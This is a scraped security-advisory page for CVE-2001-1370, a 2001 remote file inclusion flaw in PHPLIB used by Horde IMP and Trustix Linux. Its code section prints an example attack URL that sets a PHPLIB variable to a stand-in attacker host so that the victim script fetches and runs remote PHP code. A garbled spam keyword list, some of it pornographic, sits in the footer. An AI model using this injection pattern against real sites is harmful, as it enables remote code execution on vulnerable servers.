exploits , vulnerabilities , articles , Multiple Vendor PHPLIB Remote Script Execution Vulnerability
| Title |
Multiple Vendor PHPLIB Remote Script Execution Vulnerability |
| Published |
2001-07-21-12:00AM |
| Updated |
2001-08-13-02:59PM |
| Class |
Input Validation Error |
| CVE |
CVE-2001-1370 |
| Remote |
Yes |
| Local |
No |
| Credit |
This vulnerability was discovered by giancarlo pinerolo <giancarlo@navigare.net> and submitted to BugTraq on July 21st, 2001 by "Brent J. Nordquist" <bjn@horde.org>. |
| Vulnerable |
PHPLib Team PHPLIB 7.2.1
Horde IMP 2.0
Horde IMP 2.2
Horde IMP 2.2.1
Horde IMP 2.2.2
Horde IMP 2.2.3
Horde IMP 2.2.4
Horde IMP 2.2.5
Trustix Secure Linux 1.1
Trustix Secure Linux 1.2
Trustix Secure Linux 1.5
PHPLib Team PHPLIB 7.2 c
Horde IMP 2.0
Horde IMP 2.2.1
Horde IMP 2.2.2
Horde IMP 2.2.3
Horde IMP 2.2.4
Horde IMP 2.2.5
Trustix Secure Linux 1.1
Trustix Secure Linux 1.2
Trustix Secure Linux 1.5
PHPLib Team PHPLIB 7.2 b
Horde IMP 2.0
Horde IMP 2.2
Horde IMP 2.2.1
Horde IMP 2.2.2
Horde IMP 2.2.3
Horde IMP 2.2.4
Horde IMP 2.2.5
Trustix Secure Linux 1.1
Trustix Secure Linux 1.2
Trustix Secure Linux 1.5
PHPLib Team PHPLIB 7.2
Horde IMP 2.0
Horde IMP 2.2
Horde IMP 2.2.1
Horde IMP 2.2.2
Horde IMP 2.2.3
Horde IMP 2.2.4
Horde IMP 2.2.5
Trustix Secure Linux 1.1
Trustix Secure Linux 1.2
Trustix Secure Linux 1.5
|
| Not Vulnerable |
PHPLib Team PHPLIB 7.2 d |
| Code |
An example was provided by giancarlo pinerolo <giancarlo@navigare.net>:
If $_PHPLIB[libdir] is a string whose value
is "http://attacker.com/", this instruction will be executed:
require("http://attacker.com/" . "db_mysql.inc");
Thus, simply crafting a URL like:
http://victim.com/any/phplib/page.php?_PHPLIB[libdir]=http://attacker.com/
will make the script 'page.php'(which the attacker knows is based on the PHPLIB toolkit) include and execute any arbitrary php instruction contained in a file named 'db_mysql.inc'.
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Tue, 02 Dec 2008 22:45:26 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
priya Rai www.89.cm. WWW.Sexsex Enzo_01 mailman CMS is Fre iran pictu www.sex .c t384t Apache htt Www.Worlds rus porno net crash www. vedio OpenSSH 3. familysex. smartermai Bollywod+s _get Sex movx productdis 200 /compo admin_even south indi yulewangzh sexe 3gp f WWW.PLAYBO VULNERABIL news for c eros ramaz XLXX ohix Serv u bollywood t942t t942t yahoo chat www.hotsex Html 200+/compo p.../mvcw. sex uideos Www.fd5.co www.zoofuk thttpd 2.2 movies fil Free downl Www.sex pi Xxxsex.com Sxe inject
|
